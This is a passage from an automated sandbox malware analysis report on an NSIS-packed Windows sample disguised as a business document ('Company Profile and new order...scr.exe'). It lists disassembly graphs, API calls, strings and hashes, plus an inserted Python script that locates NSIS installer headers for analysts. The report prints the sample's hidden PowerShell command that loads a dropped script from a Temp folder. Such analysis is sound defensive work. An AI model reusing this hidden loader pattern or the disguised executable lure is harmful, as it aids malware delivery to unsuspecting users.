                                                                                            • Associated: 00000000.00000002.2088088396.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000443000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000446000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000467000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Company Profile and new order-202401127.jbxd
                                                                                            Similarity
                                                                                            • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                            • String ID: "C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                                            • API String ID: 2035342205-2875471304
                                                                                            • Opcode ID: 9251ba415d381c0528a68256adb7b13e134a55f337ff098e8b7b00a93e79b23f
                                                                                            • Instruction ID: aec485693c4c1533f42b9347a66a6bbcb57ea8568fe9c979ecac7928daa7b7f5
                                                                                            • Opcode Fuzzy Hash: 9251ba415d381c0528a68256adb7b13e134a55f337ff098e8b7b00a93e79b23f
                                                                                            • Instruction Fuzzy Hash: 8741D230801A14BADB31BB659D4DAAF7678EF41718F14813FF801B11D5D77C8A829EAE

                                                                                            Control-flow Graph

                                                                                            control_flow_graph 730 40687e-406892 FindFirstFileW 731 406894-40689d FindClose 730->731 732 40689f 730->732 733 4068a1-4068a2 731->733 732->733
                                                                                            APIs
                                                                                            • FindFirstFileW.KERNELBASE(75923420,00425F58,C:\Users\user\AppData\Local\Temp\nsy3BF7.tmp,00405F41,C:\Users\user\AppData\Local\Temp\nsy3BF7.tmp,C:\Users\user\AppData\Local\Temp\nsy3BF7.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsy3BF7.tmp,C:\Users\user\AppData\Local\Temp\nsy3BF7.tmp,75923420,?,C:\Users\user\AppData\Local\Temp\,00405C4D,?,75923420,C:\Users\user\AppData\Local\Temp\), ref: 00406889
                                                                                            • FindClose.KERNEL32(00000000), ref: 00406895
                                                                                            Strings
                                                                                            • C:\Users\user\AppData\Local\Temp\nsy3BF7.tmp, xrefs: 0040687E
                                                                                            • X_B, xrefs: 0040687F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2088046348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2088027514.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2088067648.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2088088396.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2088088396.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2088088396.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000443000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000446000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000467000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Company Profile and new order-202401127.jbxd
                                                                                            Similarity
                                                                                            • API ID: Find$CloseFileFirst
                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\nsy3BF7.tmp$X_B
                                                                                            • API String ID: 2295610775-1095464576
                                                                                            • Opcode ID: 368a1c0a689282c2aa5195ddf357efb180b92b440bed087baa82a07527058284
                                                                                            • Instruction ID: 6d56574ea64d1328abe48e6f64e5cab5a12c2004fb3b9259b4ed260009733db8
                                                                                            • Opcode Fuzzy Hash: 368a1c0a689282c2aa5195ddf357efb180b92b440bed087baa82a07527058284
                                                                                            • Instruction Fuzzy Hash: AFD0123250A5205BC6406B386E0C84B7A58AF553717268A36F5AAF21E0CB788C6696AC

                                                                                            Control-flow Graph

                                                                                            control_flow_graph 734 406c3f-406c44 735 406cb5-406cd3 734->735 736 406c46-406c75 734->736 739 4072ab-4072c0 735->739 737 406c77-406c7a 736->737 738 406c7c-406c80 736->738 740 406c8c-406c8f 737->740 741 406c82-406c86 738->741 742 406c88 738->742 743 4072c2-4072d8 739->743 744 4072da-4072f0 739->744 745 406c91-406c9a 740->745 746 406cad-406cb0 740->746 741->740 742->740 747 4072f3-4072fa 743->747 744->747 748 406c9c 745->748 749 406c9f-406cab 745->749 750 406e82-406ea0 746->750 751 407321-40732d 747->751 752 4072fc-407300 747->752 748->749 756 406d15-406d43 749->756 754 406ea2-406eb6 750->754 755 406eb8-406eca 750->755 759 406ac3-406acc 751->759 757 407306-40731e 752->757 758 4074af-4074b9 752->758 760 406ecd-406ed7 754->760 755->760 762 406d45-406d5d 756->762 763 406d5f-406d79 756->763 757->751 761 4074c5-4074d8 758->761 765 406ad2 759->765 766 4074da 759->766 768 406ed9 760->768 769 406e7a-406e80 760->769 767 4074dd-4074e1 761->767 764 406d7c-406d86 762->764 763->764 771 406d8c 764->771 772 406cfd-406d03 764->772 773 406ad9-406add 765->773 774 406c19-406c3a 765->774 775 406b7e-406b82 765->775 776 406bee-406bf2 765->776 766->767 788 407461-40746b 768->788 789 406e5f-406e77 768->789 769->750 770 406e1e-406e28 769->770 782 40746d-407477 770->782 783 406e2e-406ff7 770->783 794 406ce2-406cfa 771->794 795 407449-407453 771->795 784 406db6-406dbc 772->784 785 406d09-406d0f 772->785 773->761 779 406ae3-406af0 773->779 774->739 786 406b88-406ba1 775->786 787 40742e-407438 775->787 780 406bf8-406c0c 776->780 781 40743d-407447 776->781 779->766 790 406af6-406b3c 779->790 791 406c0f-406c17 780->791 781->761 782->761 783->739 783->759 792 406e1a 784->792 793 406dbe-406ddc 784->793 785->756 785->792 797 406ba4-406ba8 786->797 787->761 788->761 789->769 798 406b64-406b66 790->798 799 406b3e-406b42 790->799 791->774 791->776 792->770 800 406df4-406e06 793->800 801 406dde-406df2 793->801 794->772 795->761 797->775 802 406baa-406bb0 797->802 808 406b74-406b7c 798->808 809 406b68-406b72 798->809 805 406b44-406b47 GlobalFree 799->805 806 406b4d-406b5b GlobalAlloc 799->806 807 406e09-406e13 800->807 801->807 803 406bb2-406bb9 802->803 804 406bda-406bec 802->804 810 406bc4-406bd4 GlobalAlloc 803->810 811 406bbb-406bbe GlobalFree 803->811 804->791 805->806 806->766 812 406b61 806->812 807->784 813 406e15 807->813 808->797 809->808 809->809 810->766 810->804 811->810 812->798 815 407455-40745f 813->815 816 406d9b-406db3 813->816 815->761 816->784
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2088046348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2088027514.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2088067648.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2088088396.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2088088396.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2088088396.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000443000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000446000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000467000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Company Profile and new order-202401127.jbxd
                                                                                            Similarity
                                                                                            • Opcode ID: 8964584eaf82ae0cb152a3b9d71f3809ce5605a589357672a1976e67bd0135b4
                                                                                            • Instruction ID: 98dfc50ccd9688b87079ede1b44bfc78bfb7a95d74622a08e623e0ee65e5f8c5
                                                                                            • Opcode Fuzzy Hash: 8964584eaf82ae0cb152a3b9d71f3809ce5605a589357672a1976e67bd0135b4
                                                                                            • Instruction Fuzzy Hash: B2F17870D04229CBDF28CFA8C8946ADBBB0FF44305F25816ED456BB281D7786A86CF45

                                                                                            Control-flow Graph

                                                                                            Control-flow graph (rendered interactively in the report, with executed and not-executed basic blocks distinguished; the edge list is not reproduced here): entry block 00403FA1, which is the dialog procedure passed to DialogBoxParamW at 00403E7C, 107 basic blocks (nodes 202-308) spanning 00403FA1-00404476; the USER32 calls made from these blocks are listed under APIs below.
                                                                                            APIs
                                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403FDD
                                                                                            • ShowWindow.USER32(?), ref: 00403FFD
                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 0040400F
                                                                                            • ShowWindow.USER32(?,00000004), ref: 00404028
                                                                                            • DestroyWindow.USER32 ref: 0040403C
                                                                                            • SetWindowLongW.USER32(?,00000000,00000000), ref: 00404055
                                                                                            • GetDlgItem.USER32(?,?), ref: 00404074
                                                                                            • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00404088
                                                                                            • IsWindowEnabled.USER32(00000000), ref: 0040408F
                                                                                            • GetDlgItem.USER32(?,00000001), ref: 0040413A
                                                                                            • GetDlgItem.USER32(?,00000002), ref: 00404144
                                                                                            • SetClassLongW.USER32(?,000000F2,?), ref: 0040415E
                                                                                            • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004041AF
                                                                                            • GetDlgItem.USER32(?,00000003), ref: 00404255
                                                                                            • ShowWindow.USER32(00000000,?), ref: 00404276
                                                                                            • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00404288
                                                                                            • EnableWindow.USER32(?,?), ref: 004042A3
                                                                                            • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004042B9
                                                                                            • EnableMenuItem.USER32(00000000), ref: 004042C0
                                                                                            • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004042D8
                                                                                            • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004042EB
                                                                                            • lstrlenW.KERNEL32(00422F08,?,00422F08,00000000), ref: 00404315
                                                                                            • SetWindowTextW.USER32(?,00422F08), ref: 00404329
                                                                                            • ShowWindow.USER32(?,0000000A), ref: 0040445D
                                                                                            Similarity
                                                                                            • API ID: Window$Item$MessageSendShow$Long$EnableMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                            • API String ID: 121052019-0
                                                                                            • Opcode ID: f0b43cd8e7f2e41f431c118fff2888e9d111a3339ebed408ace792690fb64996
                                                                                            • Instruction ID: 6cd4652e30ec862c23bd12a6162173760bab2c1fa5186c41ecc3a298f9dddab8
                                                                                            • Opcode Fuzzy Hash: f0b43cd8e7f2e41f431c118fff2888e9d111a3339ebed408ace792690fb64996
                                                                                            • Instruction Fuzzy Hash: 7FC1C0B1600204ABDB216F21EE49E2B3A69FB94709F41053EF751B51F0CB795882DB2E

                                                                                            Control-flow Graph

                                                                                            Control-flow graph (rendered interactively in the report, with executed and not-executed basic blocks distinguished; the edge list is not reproduced here): entry block 00403BF3, 72 basic blocks (nodes 309-380) spanning 00403BF3-00403EC8; the imported API calls and the internal subroutines reached from these blocks (00406915, 00406468, 004063EF, 00403EC9, 00405EF8, 0040655E, 0040140B, 004068A5, 00405679, 00403B43) are listed under APIs below.
                                                                                            APIs
                                                                                              • Part of subcall function 00406915: GetModuleHandleA.KERNEL32(?,00000020,?,0040360C,0000000C,?,?,?,?,?,?,?,?), ref: 00406927
                                                                                              • Part of subcall function 00406915: GetProcAddress.KERNEL32(00000000,?), ref: 00406942
                                                                                            • lstrcatW.KERNEL32(1033,00422F08,80000001,Control Panel\Desktop\ResourceLocale,00000000,00422F08,00000000,00000002,75923420,C:\Users\user\AppData\Local\Temp\,00000000,"C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exe",00008001), ref: 00403C74
                                                                                            • lstrlenW.KERNEL32(: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Local\Temp\nonopposable\ff4,1033,00422F08,80000001,Control Panel\Desktop\ResourceLocale,00000000,00422F08,00000000,00000002,75923420), ref: 00403CF4
                                                                                            • lstrcmpiW.KERNEL32(?,.exe,: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Local\Temp\nonopposable\ff4,1033,00422F08,80000001,Control Panel\Desktop\ResourceLocale,00000000,00422F08,00000000), ref: 00403D07
                                                                                            • GetFileAttributesW.KERNEL32(: Completed), ref: 00403D12
                                                                                            • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Temp\nonopposable\ff4), ref: 00403D5B
                                                                                              • Part of subcall function 00406468: wsprintfW.USER32 ref: 00406475
                                                                                            • RegisterClassW.USER32(004289C0), ref: 00403D98
                                                                                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403DB0
                                                                                            • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403DE5
                                                                                            • ShowWindow.USER32(00000005,00000000), ref: 00403E1B
                                                                                            • GetClassInfoW.USER32(00000000,RichEdit20W,004289C0), ref: 00403E47
                                                                                            • GetClassInfoW.USER32(00000000,RichEdit,004289C0), ref: 00403E54
                                                                                            • RegisterClassW.USER32(004289C0), ref: 00403E5D
                                                                                            • DialogBoxParamW.USER32(?,00000000,00403FA1,00000000), ref: 00403E7C
                                                                                            Similarity
                                                                                            • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                            • String ID: "C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exe"$.DEFAULT\Control Panel\International$.exe$1033$: Completed$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nonopposable\ff4$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                            • API String ID: 1975747703-3474789257
                                                                                            • Opcode ID: 0ef04955f1a6976a10593322067df9edaff6e7f7a832361b73f8beed2d85b6c9
                                                                                            • Instruction ID: 6a74b9b34ded998ebd2751605f77428bf44f11e359ee0ac59d58ca77ea789e65
                                                                                            • Opcode Fuzzy Hash: 0ef04955f1a6976a10593322067df9edaff6e7f7a832361b73f8beed2d85b6c9
                                                                                            • Instruction Fuzzy Hash: 2C61B770200740BAD620AF669D46F2B3A7CEB84B45F81453FF941B61E2CB7D5942CB6D

                                                                                            Control-flow Graph

                                                                                            Control-flow graph (rendered interactively in the report, with executed and not-executed basic blocks distinguished; the edge list is not reproduced here): entry block 00403082, 67 basic blocks (nodes 383-449) spanning 00403082-004032B6; the API calls and string cross-references for these blocks are listed under APIs and Strings below.
                                                                                            APIs
                                                                                            • GetTickCount.KERNEL32 ref: 00403093
                                                                                            • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exe,00000400), ref: 004030AF
                                                                                              • Part of subcall function 00406011: GetFileAttributesW.KERNELBASE(00000003,004030C2,C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exe,80000000,00000003), ref: 00406015
                                                                                              • Part of subcall function 00406011: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406037
                                                                                            • GetFileSize.KERNEL32(00000000,00000000,00438000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exe,C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exe,80000000,00000003), ref: 004030FB
                                                                                            • GlobalAlloc.KERNELBASE(00000040,?), ref: 00403231
                                                                                            Strings
                                                                                            • Inst, xrefs: 00403167
                                                                                            • soft, xrefs: 00403170
                                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00403089
                                                                                            • "C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exe", xrefs: 00403088
                                                                                            • Installer integrity check has failed. Common causes include incomplete download and damaged media. Contact the installer's author , xrefs: 00403258
                                                                                            • C:\Users\user\Desktop, xrefs: 004030DD, 004030E2, 004030E8
                                                                                            • Error launching installer, xrefs: 004030D2
                                                                                            • C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exe, xrefs: 00403099, 004030A8, 004030BC, 004030DC
                                                                                            • Null, xrefs: 00403179
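The "Inst", "soft" and "Null" strings cross-referenced at 00403167, 00403170 and 00403179, together with the "Error launching installer" and "Installer integrity check has failed" messages, are the NSIS stub's self-file scan: the three words are the dwords of the NSIS firstheader signature (FH_INT1..FH_INT3 in NSIS's exehead fileform.h), and the loop around GetFileSize, GlobalAlloc and SetFilePointer walks the sample's own image looking for them. The script below is an added example, not code from the report or from the sample: it reproduces that scan and the CRC check so an analyst can locate the NSIS datablock (where GuLoader's dropped script and payload live) without running the installer. The header layout, flag bits and 512-byte scan step follow the NSIS source; the blob produced by build_sample() is constructed here so the script runs offline and is not the analysed file.

```python
"""Locate and check the NSIS 'firstheader' that the stub at 00403082 scans for.

Added example, not part of the Joe Sandbox report or of the sample's own code.
Structure, signature constants and flag bits are from NSIS's fileform.h; the
blob returned by build_sample() is constructed for demonstration only.
"""
import struct
import zlib

FH_SIG = 0xDEADBEEF
FH_INT1, FH_INT2, FH_INT3 = 0x6C6C754E, 0x74666F73, 0x74736E49  # "Null", "soft", "Inst"
FH_FLAGS_MASK = 0x0F
FH_FLAGS = {1: "uninstall", 2: "silent", 4: "no_crc", 8: "force_crc"}

# firstheader: int flags, siginfo, nsinst[3], length_of_header,
#              length_of_all_following_data (seven little-endian 32-bit ints)
FIRSTHEADER = struct.Struct("<iIIIIII")
SCAN_STEP = 512  # the stub reads 512-byte chunks until the header is found


def find_nsis_firstheader(data: bytes):
    """Scan `data` the way the NSIS loader does and describe the firstheader.

    Returns None when no plausible header exists. A candidate is rejected on
    the same conditions the loader uses: unknown flag bits set, or a
    length_of_all_following_data that runs past the end of the file.
    """
    for off in range(0, len(data) - FIRSTHEADER.size + 1, SCAN_STEP):
        flags, sig, n0, n1, n2, hdr_len, total_len = FIRSTHEADER.unpack_from(data, off)
        # the stub compares "Inst", then "soft", then "Null" (nsinst[2], [1], [0])
        if sig != FH_SIG or (n2, n1, n0) != (FH_INT3, FH_INT2, FH_INT1):
            continue
        if flags & ~FH_FLAGS_MASK or total_len > len(data) - off:
            continue
        return {
            "offset": off,
            "flags_raw": flags,
            "flags": [name for bit, name in FH_FLAGS.items() if flags & bit],
            "length_of_header": hdr_len,
            "length_of_all_following_data": total_len,
            "datablock_offset": off + FIRSTHEADER.size,
        }
    return None


def verify_nsis_crc(data: bytes, fh: dict):
    """Replay the check behind "Installer integrity check has failed".

    The stored CRC-32 is the last 4 bytes of the region the firstheader
    describes and covers everything from file offset 0 up to it (NSIS uses
    the standard zlib-compatible CRC-32). Returns None when the header says
    no CRC is present (FH_FLAGS_NO_CRC without FH_FLAGS_FORCE_CRC).
    """
    flags = fh["flags_raw"]
    if flags & 4 and not flags & 8:
        return None
    end = fh["offset"] + fh["length_of_all_following_data"]
    (stored,) = struct.unpack_from("<I", data, end - 4)
    return (zlib.crc32(data[: end - 4]) & 0xFFFFFFFF) == stored


def build_sample(flags: int = 0, datablock: bytes = b"\x00" * 64, stub_len: int = 1024) -> bytes:
    """Constructed NSIS-shaped blob for demonstration; not the analysed sample."""
    has_crc = not (flags & 4) or bool(flags & 8)
    total = FIRSTHEADER.size + len(datablock) + (4 if has_crc else 0)
    fh = FIRSTHEADER.pack(flags, FH_SIG, FH_INT1, FH_INT2, FH_INT3, 0x40, total)
    body = b"MZ" + b"\x00" * (stub_len - 2) + fh + datablock  # fake stub, then header
    if has_crc:
        body += struct.pack("<I", zlib.crc32(body) & 0xFFFFFFFF)
    return body


if __name__ == "__main__":
    import sys

    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample()
    hdr = find_nsis_firstheader(blob)
    print("no NSIS firstheader found" if hdr is None else hdr)
    if hdr is not None:
        print("crc ok:", verify_nsis_crc(blob, hdr))
```

Run it against the sample on disk to get the datablock offset to carve; the constructed blob is only there to show the two failure modes the stub's strings describe (no header found, and a header whose CRC does not match). The datablock behind the header is compressed in whichever scheme the installer was built with, so locating it is the first step before a dedicated NSIS extractor takes over.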
                                                                                            Similarity
                                                                                            • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                            • String ID: "C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                            • API String ID: 2803837635-1978725425
                                                                                            • Opcode ID: f6f149303cde104692999693530b98443d3dd0b2c967e283c98aa5a581eac7be
                                                                                            • Instruction ID: 0271efb430f2efbe2fca7880162b12dddab7439e54d706f300c55aed9b32fb97
                                                                                            • Opcode Fuzzy Hash: f6f149303cde104692999693530b98443d3dd0b2c967e283c98aa5a581eac7be
                                                                                            • Instruction Fuzzy Hash: 7B51C071A01304ABDB209F65DD85B9E7FACAB09316F10407BF904B62D1D7789E818B5D

                                                                                             Control-flow Graph (function 0040655E, interactive graph omitted)
                                                                                            APIs
                                                                                            • GetSystemDirectoryW.KERNEL32(: Completed,00000400), ref: 00406680
                                                                                            • GetWindowsDirectoryW.KERNEL32(: Completed,00000400,00000000,Completed,?,?,00000000,00000000,00418EC0,00000000), ref: 00406696
                                                                                            • SHGetPathFromIDListW.SHELL32(00000000,: Completed), ref: 004066F4
                                                                                            • CoTaskMemFree.OLE32(00000000,?,00000000,00000007), ref: 004066FD
                                                                                            • lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch,00000000,Completed,?,?,00000000,00000000,00418EC0,00000000), ref: 00406728
                                                                                            • lstrlenW.KERNEL32(: Completed,00000000,Completed,?,?,00000000,00000000,00418EC0,00000000), ref: 00406782
                                                                                            Strings
                                                                                            Similarity
                                                                                            • API ID: Directory$FreeFromListPathSystemTaskWindowslstrcatlstrlen
                                                                                            • String ID: : Completed$Completed$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                            • API String ID: 4024019347-905382516
                                                                                            • Opcode ID: 14c9f03641932d7153c154bb414b77852189b75d1473d82c894b9adbe9647435
                                                                                            • Instruction ID: c1bee3e663878f3afad94de22ef935420ccf361ce06c76a1d76179cfc985cdfa
                                                                                            • Opcode Fuzzy Hash: 14c9f03641932d7153c154bb414b77852189b75d1473d82c894b9adbe9647435
                                                                                            • Instruction Fuzzy Hash: 266146B1A043019BDB205F28DD80B6B77E4AF84318F65053FF646B32D1DA7D89A18B5E

                                                                                             Control-flow Graph (function 00401774, interactive graph omitted)
                                                                                            APIs
                                                                                            • lstrcatW.KERNEL32(00000000,00000000,powershell.exe -windowstyle hidden "$Vagtselskabets=Get-Content -Raw 'C:\Users\user\AppData\Local\Temp\nonopposable\ff4\Burglarp,C:\Users\user\AppData\Local\Temp\nonopposable\ff4,?,?,00000031), ref: 004017B5
                                                                                            • CompareFileTime.KERNEL32(-00000014,?,powershell.exe -windowstyle hidden "$Vagtselskabets=Get-Content -Raw 'C:\Users\user\AppData\Local\Temp\nonopposable\ff4\Burglarp,powershell.exe -windowstyle hidden "$Vagtselskabets=Get-Content -Raw 'C:\Users\user\AppData\Local\Temp\nonopposable\ff4\Burglarp,00000000,00000000,powershell.exe -windowstyle hidden "$Vagtselskabets=Get-Content -Raw 'C:\Users\user\AppData\Local\Temp\nonopposable\ff4\Burglarp,C:\Users\user\AppData\Local\Temp\nonopposable\ff4,?,?,00000031), ref: 004017DA
                                                                                              • Part of subcall function 00406521: lstrcpynW.KERNEL32(?,?,00000400,0040366E,00428A20,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040652E
                                                                                              • Part of subcall function 004055A6: lstrlenW.KERNEL32(Completed,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033F2,00000000,?), ref: 004055DE
                                                                                              • Part of subcall function 004055A6: lstrlenW.KERNEL32(004033F2,Completed,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033F2,00000000), ref: 004055EE
                                                                                              • Part of subcall function 004055A6: lstrcatW.KERNEL32(Completed,004033F2,004033F2,Completed,00000000,00418EC0,00000000), ref: 00405601
                                                                                              • Part of subcall function 004055A6: SetWindowTextW.USER32(Completed,Completed), ref: 00405613
                                                                                              • Part of subcall function 004055A6: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405639
                                                                                              • Part of subcall function 004055A6: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405653
                                                                                              • Part of subcall function 004055A6: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405661
                                                                                            Strings
                                                                                            Similarity
                                                                                            • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\nonopposable\ff4$Produktionsoverfrslens$powershell.exe -windowstyle hidden "$Vagtselskabets=Get-Content -Raw 'C:\Users\user\AppData\Local\Temp\nonopposable\ff4\Burglarp
                                                                                            • API String ID: 1941528284-1129404032
                                                                                            • Opcode ID: 8735ad9560c18e5a7f29f6a8244760e17f86ea249fb7e5f19f194b0f67ebe764
                                                                                            • Instruction ID: 1777f765e23ed303a4c4324df0f40fc052c607b9e3f25272d24a03cacca2a4dc
                                                                                            • Opcode Fuzzy Hash: 8735ad9560c18e5a7f29f6a8244760e17f86ea249fb7e5f19f194b0f67ebe764
                                                                                            • Instruction Fuzzy Hash: 9E41A531900509BACF117BA9DD86DAF3AB5EF45328B20423FF512B10E1DB3C8A52966D

                                                                                             Control-flow Graph (function 004055A6, interactive graph omitted)
                                                                                            APIs
                                                                                            • lstrlenW.KERNEL32(Completed,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033F2,00000000,?), ref: 004055DE
                                                                                            • lstrlenW.KERNEL32(004033F2,Completed,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033F2,00000000), ref: 004055EE
                                                                                            • lstrcatW.KERNEL32(Completed,004033F2,004033F2,Completed,00000000,00418EC0,00000000), ref: 00405601
                                                                                            • SetWindowTextW.USER32(Completed,Completed), ref: 00405613
                                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405639
                                                                                            • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405653
                                                                                            • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405661
                                                                                            Strings
                                                                                            Similarity
                                                                                            • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                            • String ID: Completed
                                                                                            • API String ID: 2531174081-3087654605
                                                                                            • Opcode ID: a9fafcf7327b9621bb894f8e2d9ac48d1397335c234e36f420f2517ccdad5277
                                                                                            • Instruction ID: deb6953f75989b306d4e6df0e2073f5bc52164b7b2c012b705af3b177d86a23e
                                                                                            • Opcode Fuzzy Hash: a9fafcf7327b9621bb894f8e2d9ac48d1397335c234e36f420f2517ccdad5277
                                                                                            • Instruction Fuzzy Hash: 8F21B375900158BACB119FA5DD84ECFBF75EF45364F50803AF944B22A0C77A4A51CF68

                                                                                             Control-flow Graph (function 004032B9, interactive graph omitted)
                                                                                            APIs
                                                                                            Strings
                                                                                            Similarity
                                                                                            • API ID: CountTick$wsprintf
                                                                                            • String ID: ... %d%%
                                                                                            • API String ID: 551687249-2449383134
                                                                                            • Opcode ID: bb69fc25e18161a0849df33240b9b7daf63c30e93ac5b68caaa3da3af3354023
                                                                                            • Instruction ID: 25ee467b37f7358b1d8943912f63d539eb3ef7c07a249f5ee2dc3eaa61b9464a
                                                                                            • Opcode Fuzzy Hash: bb69fc25e18161a0849df33240b9b7daf63c30e93ac5b68caaa3da3af3354023
                                                                                            • Instruction Fuzzy Hash: 5B518E31900219EBCB11DF65DA44BAF3FA8AB40726F14417BF804BB2C1D7789E408BA9

                                                                                             Control-flow Graph (rendered as an image in the report; recovered here as basic blocks with the calls they contain, then the edge list; the executed/not-executed colouring of the image is not recoverable from the text)
                                                                                             • 717 4068a5-4068c5: GetSystemDirectoryW
                                                                                             • 718 4068c7
                                                                                             • 719 4068c9-4068cb
                                                                                             • 720 4068dc-4068de
                                                                                             • 721 4068cd-4068d6
                                                                                             • 722 4068d8-4068da
                                                                                             • 723 4068df-406912: wsprintfW, LoadLibraryExW
